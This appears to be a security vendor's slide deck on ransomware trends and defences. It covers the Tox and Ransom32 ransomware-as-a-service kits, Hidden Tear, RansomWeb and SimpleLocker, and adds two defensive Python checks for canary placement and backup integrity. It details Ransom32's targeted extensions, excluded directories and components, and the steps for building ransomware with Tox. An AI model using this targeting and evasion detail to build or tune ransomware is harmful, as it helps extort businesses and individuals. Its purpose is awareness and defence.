TOX – free ransomware toolkit: ransomware as a service
• "Tox" offers a free build-your-own ransomware malware toolkit.
• Tox is completely free to use.
• One dark web hacker has released this for anyone to download and set up their own ransomware for free.
• Tox, which runs on Tor, requires little technical skill to use.
• It is designed in such a way that almost anyone can easily deploy ransomware in three simple steps.
• Once a user has registered with the site, these three simple steps create your own malware:
  • Type the ransom amount you want to ask victims for.
  • Provide an additional note in the "Cause" field, the message that will tell victims that they are being held hostage by a piece of malware.
  • Finally, you are prompted to fill out a CAPTCHA and click "Create".
• "This process creates an executable of about 2MB that is disguised as a .scr file. Then the Tox [users] distribute and install as they see fit. The Tox site (runs on the TOR network) will track the installs and profit. To withdraw funds, you need only supply a receiving Bitcoin address." – McAfee

RaaS – next generation "ransomware as a service"

Cryptolocker/CTB-Locker/CryptoWall etc. (charts: ransom demands, infections by country and by date)
• 4.61299511 bitcoins ≈ DKK 10,000
Source: http://malware.dontneedcoffee.com

When sharing becomes too much…
• In mid-August the Turkish security researcher Utku Sen published open-source code for the ransomware "Hidden Tear" on GitHub
• Hidden Tear uses AES encryption and can evade common AV platforms
• Utku Sen also published a short video demonstrating how the ransomware worked. While this may be helpful for some, there are significant risks.
• Warning in the repository: "Hidden Tear may be used only for Educational Purposes. Do not use it as a ransomware! You could go to jail on obstruction of justice charges just for running Hidden Tear, even though you are innocent."
• … but not everyone on the Internet obeys this warning
• Trend Micro discovered a hacked website in Paraguay distributing ransomware detected as RANSOM_CRYPTEAR.B
• The ransomware was created using modified Hidden Tear code
http://blog.trendmicro.rsvp1.com/trendlabs-security-intelligence/a-case-of-too-much-information-ransomware-code-shared-publicly-for-educational-purposes-used-maliciously-anyway
http://www.trendmicro.rsvp1.com/vinfo/us/threat-encyclopedia/malware/ransom_cryptear.b

What is the development around ransomware? (1/2) – current status and trends
• Current data shows that almost 70% of incidents hit small and medium-sized businesses, followed by large companies and private individuals – though there is probably a large number of unreported cases behind the statistics
• More file types than before are being hit, both to affect more victims and to hit specific file types of high value to the victim, e.g. saved games for gamers and CAD drawings in an engineering firm or architectural practice
• Crypto ransomware has become more business-oriented: previously it was mainly aimed at private individuals, but newer versions go after "professional" file types and network drives (e.g. CryptoFortress) and demand a higher ransom
• Ransomware with "network worm" functionality, i.e. spreading internally in the company to all servers and clients – potential for much greater damage and extortion of larger amounts
• Theft of data followed by extortion under threat of publishing personal and sensitive data on the Internet
• Criminals (a "cyber mafia") will deliberately attack consultancies and public authorities with ransomware and extort large sums from organisations that do not want their business disrupted or their intellectual property compromised
• Most crypto ransomware calls itself CryptoLocker, simply to exploit the "brand" name that Cryptolocker has built up

What is the development around ransomware? (2/2) – current status and trends
• Filenames are encrypted so that it becomes harder to see what has been encrypted; a unique encryption key for each file
• Crypto ransomware has gone "freemium": decrypt a couple of files for free to convince the victims that they will actually get their data back if they pay
• "Offline" encryption, i.e. the encryption can start without the client having Internet access
• Newer Cryptolocker variants delete Volume Shadow Copies (Windows' built-in backup function) so that the victim cannot restore data that way
• New dormant and obfuscated ransomware variants that encrypt data covertly:
  • Still allow access to the data
  • Wait until a backup has been taken (so the backup also contains encrypted data)
  • Then remove the encryption key and demand a (very large) ransom
• Ransomware-as-a-service hosted on the Tor network, and the use of Bitcoin for ransom payments, make it easy to start out as a cyber criminal

Ransomware attacks doubled in 2015
• Over half (54%) of all malware targeting UK users in 2015 contained some form of ransomware.

Ransom32: JavaScript-only ransomware-as-a-service (RaaS)
• Fully developed in JavaScript, HTML and CSS using NW.js (http://nwjs.io/)
• Potentially allows multi-platform infections after repackaging for Linux and Mac OS X
• Do not confuse Java and JavaScript:
  • Java – object-oriented programming language, originally developed by Sun and now owned by Oracle
  • JavaScript – object-oriented client-side scripting language implemented in the browser
• All you need to get your own customised ransomware is a Bitcoin address to send your earnings to
• NW.js bundles Node.js, standard JavaScript scripts and Chromium into a single executable
• Chromium executes and launches the JavaScript scripts
• The malware package is a self-extracting RAR file of 22 MB which expands to over 67 MB
• NW.js is a legitimate framework, so antivirus signature coverage is very poor
• No administrative rights necessary.
• Runs under the security context of the user
Sources:
http://blog.emsisoft.com/2016/01/01/meet-ransom32-the-first-javascript-ransomware/
http://www.computerworld.com/article/3018972/security/ransom32-first-of-its-kind-javascript-based-ransomware-spotted-in-the-wild.html

Ransom32 - Unwrapping the behemoth
• Automatically unpacks using the script language implemented in WinRAR
• Executes the "chrome.exe" file contained in the archive
• "chrome" contains a copy of the GPL license agreement.
• "chrome.exe" is a packaged NW.js application and contains the actual malware code as well as the framework required to run the malware.
• "ffmpegsumo.dll", "nw.pak", "icudtl.dat" and "locales" contain data that are required by the NW.js framework to function properly.
• "rundll32.exe" is a renamed copy of the Tor client.
• "s.exe" is a renamed copy of Optimum X Shortcut, a utility to create and manipulate Desktop and start menu shortcuts.
• "g" contains the malware's configuration information as configured in the web interface.
• "msgbox.vbs" is a small script that displays a customizable popup message and is used to display the configured message box.
• "u.vbs" is a small script that enumerates and deletes all files and folders in a given directory.
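To see which files Ransom32's rules would actually touch (the extension patterns and excluded-directory strings listed on the following slide), here is an added Python example that is not code from the presentation or from the malware: it reproduces those rules so a defender can check where a canary file would, and would not, be hit. TARGET_PATTERNS is a subset of the slide's list and the sample paths are constructed.

```python
# Added example, not from the presentation or from Ransom32: reproduces the
# slide's targeting rules (extension globs and excluded-directory strings) so a
# defender can check which files, e.g. canary files, this family would touch.
# TARGET_PATTERNS is a subset of the slide's list; sample paths are constructed.
import fnmatch

TARGET_PATTERNS = [  # same glob syntax as the slide; *.*sav* matches any name containing ".sav"
    "*.jpg", "*.png", "*.doc", "*.docx", "*.xlsx", "*.pdf", "*.sql", "*.db",
    "*.dwg", "*.c", "*.cpp", "*.java", "*.psd", "*.txt", "*.csv", "*.xml",
    "*.*sav*", "*.*game*", "*.*slot*",
]
EXCLUDED_DIR_STRINGS = [  # the malware skips any directory containing one of these
    ":\\windows\\", ":\\winnt\\", "programdata\\", "boot\\", "temp\\", "tmp\\", "$recycle.bin\\",
]

def is_targeted(path):
    """True if Ransom32 would try to encrypt this Windows path, per the slide."""
    lowered = path.lower()
    directory, _, name = lowered.rpartition("\\")
    if any(s in directory + "\\" for s in EXCLUDED_DIR_STRINGS):
        return False  # directory exclusion wins, whatever the extension
    return any(fnmatch.fnmatchcase(name, pat) for pat in TARGET_PATTERNS)

def targeted_paths(paths):
    """Filter paths down to the ones inside the target set."""
    return [p for p in paths if is_targeted(p)]

# Constructed sample paths showing where a canary file would, and would not, fire.
SAMPLE_PATHS = [
    r"C:\Users\alice\Documents\report.docx",
    r"C:\Users\alice\Pictures\holiday.jpg",
    r"C:\Users\bob\Saved Games\level3.sav",
    r"C:\ProgramData\canary.docx",          # skipped: programdata\ is excluded
    r"C:\Windows\Temp\notes.txt",           # skipped: :\windows\ is excluded
    r"C:\Users\alice\Documents\notes.md",   # not a targeted extension
]

if __name__ == "__main__":
    for p in SAMPLE_PATHS:
        print(("TARGET  " if is_targeted(p) else "skipped ") + p)
```

The practical point is that a canary placed under ProgramData or a temp directory never fires for this family; it has to sit among the user's document and picture folders.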
The content of the Ransom32 SFX archive
The "g" file contains the malware's configuration formatted as JSON

Ransom32
Files with the following file extensions are being targeted:
*.jpg, *.jpeg, *.raw, *.tif, *.gif, *.png, *.bmp, *.3dm, *.max, *.accdb, *.db, *.dbf, *.mdb, *.pdb, *.sql, *.*sav*, *.*spv*, *.*grle*, *.*mlx*, *.*sv5*, *.*game*, *.*slot*, *.dwg, *.dxf, *.c, *.cpp, *.cs, *.h, *.php, *.asp, *.rb, *.java, *.jar, *.class, *.aaf, *.aep, *.aepx, *.plb, *.prel, *.prproj, *.aet, *.ppj, *.psd, *.indd, *.indl, *.indt, *.indb, *.inx, *.idml, *.pmd, *.xqx, *.xqx, *.ai, *.eps, *.ps, *.svg, *.swf, *.fla, *.as3, *.as, *.txt, *.doc, *.dot, *.docx, *.docm, *.dotx, *.dotm, *.docb, *.rtf, *.wpd, *.wps, *.msg, *.pdf, *.xls, *.xlt, *.xlm, *.xlsx, *.xlsm, *.xltx, *.xltm, *.xlsb, *.xla, *.xlam, *.xll, *.xlw, *.ppt, *.pot, *.pps, *.pptx, *.pptm, *.potx, *.potm, *.ppam, *.ppsx, *.ppsm, *.sldx, *.sldm, *.wav, *.mp3, *.aif, *.iff, *.m3u, *.m4u, *.mid, *.mpa, *.wma, *.ra, *.avi, *.mov, *.mp4, *.3gp, *.mpeg, *.3g2, *.asf, *.asx, *.flv, *.mpg, *.wmv, *.vob, *.m3u8, *.csv, *.efx, *.sdf, *.vcf, *.xml, *.ses, *.dat
The malware will not attempt to encrypt any files if they are located in a directory that contains any of the following strings:
:\windows\ :\winnt\ programdata\ boot\ temp\ tmp\ $recycle.bin\

Ransom32
A web interface allows you to see how many systems the malware has infected and how many Bitcoins it has earned, and lets you further customize the malware
The ransom note displayed by the malware

Ransomweb
Ransomweb – ransomware that encrypts websites and web servers
• High-Tech Bridge:
In December 2014, our security experts discovered a very interesting case of a financial company website compromise: the website was out of service displaying a database error, while the website owner got an email asking for a ransom to "decrypt the database".
The web application in question was pretty simple and small, but very important for the business of the company, which could not afford to suspend it, nor to announce its compromise. Careful investigation that we performed revealed the following:
• The web application was compromised six months ago; several server scripts were modified to encrypt data before inserting it into the database, and to decrypt it after getting data from the database. A sort of "on-the-fly" patching invisible to web application users.
• Only the most critical fields of the database tables were encrypted (probably so as not to impact web application performance much).
• All previously existing database records were encrypted accordingly.
• The encryption key was stored on a remote web server accessible only via HTTPS (probably to avoid key interception by various traffic monitoring systems).
• During the six months, the hackers were silently waiting while backups were being overwritten by recent versions of the database.
• On day X, the hackers removed the key from the remote server. The database became unusable, the website went out of service, and the hackers demanded a ransom for the encryption key.

RansomWeb: Crooks Start Encrypting Websites And Demanding Thousands Of Dollars From Businesses
Thomas Fox-Brewster, Jan 28, 2015 @ 07:36 AM
In another startling development in the world of cyber crime, malicious hackers have started taking over website servers, encrypting the data on them and demanding payment to unlock the files. A large European financial services company, whose name was not disclosed, was the first known victim of this potentially business-destroying attack, according to Swiss security firm High-Tech Bridge, which investigated the breach in December 2014. The security firm labelled the attack RansomWeb. The brazen techniques used and the high ransom represent a more aggressive take on ransomware – malware which encrypted people's PCs and asked for payment, typically between $100 and £1,000.
Though only a handful of attacks have been seen, many expect such extortion to grow rapidly in 2015. The initial attack started six months prior to the victim's website being shut down by the hackers, who were surreptitiously locking up the most critical data on the server using "on-the-fly" tweaks to the site's PHP code functions. The criminals stored the key to decrypt the data on their own remote web server accessible only via HTTPS encrypted communications, supposed to guarantee no one with visibility on those connections could get access to the data but them. As soon as they pulled the key and data was no longer being silently encrypted and decrypted, the website was knocked out of action. That's when employees at the financial services firm were sent emails from a Gmail account, demanding the firm pay $50,000 to get their website back. They threatened to increase the price by 10 per cent with every passing week.
http://www.forbes.com/sites/thomasbrewster/2015/01/28/ransomweb-50000-dollar-extortion/

Android SimpleLocker
• May 2014 – SimpleLocker appears in Ukraine
• Asks for $22 USD using Monexy
• Uses TOR for C&C
• Checks the SD card for:
  • jpeg, jpg, png, bmp, gif, pdf, doc, docx, txt, avi, mkv, 3gp, mp4
• Unlike CryptoLocker, the encryption key is hardcoded in the malware. Encrypted files are appended with ".enc".

Recommendations
Awareness, Basic controls, Updates, Privileges, Backup, Preparation

Sandbox – emulated execution
• The collected data can be tested in a sandbox to verify whether it is malicious.
• Will reveal exploits, download of additional malware and call-back.
• Suspicious behaviour or traffic becomes visible.
Virtual analysis images: Win 7 / Office10 / Adobe 11; Win XP / Office07 / Adobe 10; Windows Server

What can we do?
- Practical recommendations (1)
• Defence in depth: Use different and overlapping security measures, so that there is no single point of failure in any one measure or technology
• Basic controls: Keep focus on the basic controls, and remember the ongoing follow-up
• Monitoring: Many organisations only discover a security breach when they get a call from the police or a customer. Monitoring of log files and change management can give earlier warning
• Antivirus is not enough: Antivirus still catches many attacks, but you also see many attacks with unique malware and exploitation of zero-day vulnerabilities, which require other tools
• Endpoint protection: Endpoints must be protected by more than antivirus - remember updates, limited privileges, web security, device control
• Patch immediately: Attackers often gain access using simple attack methods that can be defended against with an updated and well-configured IT environment and updated antivirus
• Encrypt sensitive data: If data is lost or stolen, it is much harder for a criminal to misuse it
• Protect encryption keys: If the encryption keys are compromised, the security is compromised too
• Two-factor authentication: This will not eliminate the risk of passwords being stolen, but it can limit the damage that can be done through misuse of stolen credentials

What can we do? - Practical recommendations (2)
• People: Awareness is still important. Teach your employees the importance of security, how to spot an attack, and what to do when they see something suspicious
• Keep access to data on a "need-to-know" basis: Limit access to systems to the personnel who need it. Make sure processes are in place to revoke access again when people change role or job
• Remember physical security: Not all data theft happens online.
Criminals will tamper with computers or payment terminals, or steal documents
• Backup: If all other measures fail, a backup can save the data. Remember to protect the backup media…
• Incident response: Plan on the assumption that incidents will happen; follow up continuously on how, and how quickly, incidents are detected and handled, so the response can be improved over time
• Follow-up: Don't forget the basic controls. Keep focus on better and faster detection through a mix of people, processes and technology
• Threat landscape: Keep an eye on the threat landscape so the security solution can be adjusted continuously. Remember that "one size fits all" does not hold in reality
• Risk assessment: If you are a target for actual espionage, do not underestimate the persistence, expertise and tools of your adversary

Risk limitation
• Risk cannot be eliminated, only limited
• Security cannot be bought as a product
• Security is achieved through a mix of
  • Procedures & management (management issues)
  • Design, tools and technical solutions
  • Ongoing monitoring and maintenance
• Result: Formulation of a security policy and implementation of a security system

Stay up to date
Subscribe to Dubex's newsletter
Visit www.dubex.dk
www.dubex.dk/update/
Follow Dubex on LinkedIn & Twitter
twitter.com/Dubex
www.linkedin.com/company/dubex-as
Attend Dubex's events
http://www.dubex.dk/arrangementer/
Thanks!
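Tying the RansomWeb case to the "Monitoring" and "Backup" recommendations above, here is an added Python example that is not code from the presentation or from High-Tech Bridge. It shows the two checks that would have surfaced that compromise months early: an integrity baseline of the web application's server scripts (the "on-the-fly" PHP edits show up as changed files) and a restore-drill test that flags critical backup fields holding random-looking data, i.e. a backup that contains ciphertext. The sample files, the records and the entropy threshold are constructed and assumed.

```python
# Added example (not from the presentation or High-Tech Bridge): a file-integrity
# check for the web app's server scripts plus a restore-drill test that flags
# backup fields holding random-looking data. Samples and threshold are constructed.
import hashlib, math, os, tempfile
from collections import Counter

def baseline(root):
    """Map each file under root (relative path) to its SHA-256 hex digest."""
    out = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                out[os.path.relpath(full, root)] = hashlib.sha256(fh.read()).hexdigest()
    return out

def changed_files(root, known_good):
    """Relative paths whose digest differs from the baseline, plus new or missing files."""
    now = baseline(root)
    return sorted(p for p in set(now) | set(known_good) if now.get(p) != known_good.get(p))

def shannon_entropy(text):
    """Bits per character of text (0.0 for an empty string)."""
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values()) if n else 0.0

def field_looks_encrypted(value, threshold=4.2):
    """Base64/hex ciphertext has far higher entropy than a name or address; threshold assumed."""
    return len(value) >= 16 and " " not in value and shannon_entropy(value) > threshold

def check_backup(records, critical_fields):
    """(record index, field) pairs whose critical field looks encrypted."""
    return [(i, f) for i, r in enumerate(records) for f in critical_fields
            if field_looks_encrypted(str(r.get(f, "")))]

# Constructed records: 0 is normal; 1 is what a backup taken after the silent
# encryption began would hold (random-looking stand-ins for ciphertext).
SAMPLE_BACKUP = [
    {"id": 1, "name": "Jane Smith", "email": "jane.smith@example.com"},
    {"id": 2, "name": "Zq8LmX3vT1pR6nK0aW9sY4bH", "email": "7Ht2Kp9Xc4VbQ1zL5nM8wR3e"},
]

def run_demo():
    """Baseline a constructed web root, alter one script, report what changed."""
    root = tempfile.mkdtemp()
    for name in ("index.php", "db.php"):
        with open(os.path.join(root, name), "w") as fh:
            fh.write("<?php // " + name)
    known_good = baseline(root)
    with open(os.path.join(root, "db.php"), "a") as fh:  # unexpected edit to the DB script
        fh.write("\n// changed")
    return changed_files(root, known_good)
```

Run `run_demo()` against a real web root by replacing the constructed files, and feed `check_backup()` the rows of a restored backup rather than SAMPLE_BACKUP; either check firing inside the six-month waiting window defeats the attack.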